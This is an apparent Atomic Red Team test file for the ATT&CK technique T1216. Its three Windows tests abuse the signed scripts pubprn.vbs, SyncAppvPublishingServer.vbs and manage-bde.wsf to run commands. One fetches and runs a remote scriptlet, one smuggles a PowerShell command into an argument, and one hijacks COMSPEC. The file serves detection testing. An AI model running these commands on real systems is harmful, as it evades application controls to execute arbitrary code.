---
attack_technique: T1216
display_name: Signed Script Proxy Execution

atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
  auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c
  description: |
    Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.

  supported_platforms:
    - windows

  input_arguments:
    remote_payload:
      description: A remote payload to execute using PubPrn.vbs.
      type: Url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/src/T1216.sct

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"

- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
  auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb
  description: |
    Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
    Upon execution, calc.exe will be launched.

  supported_platforms:
    - windows

  input_arguments:
    command_to_execute:
      description: A PowerShell command to execute.
      type: string
      default: Start-Process calc

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"

- name: manage-bde.wsf Signed Script Command Execution
  auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
  description: |
    Executes the signed manage-bde.wsf script with options to execute an arbitrary command.

  supported_platforms:
    - windows

  input_arguments:
    command_to_execute:
      description: A command to execute.
      type: Path
      default: C:\Windows\System32\calc.exe

  executor:
    name: command_prompt
    elevation_required: false
    command: | # these are the actaul attack commands, at least one command must be provided
      set comspec=#{command_to_execute}
      cscript manage-bde.wsf
    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
      set comspec=C:\Windows\System32\cmd.exe
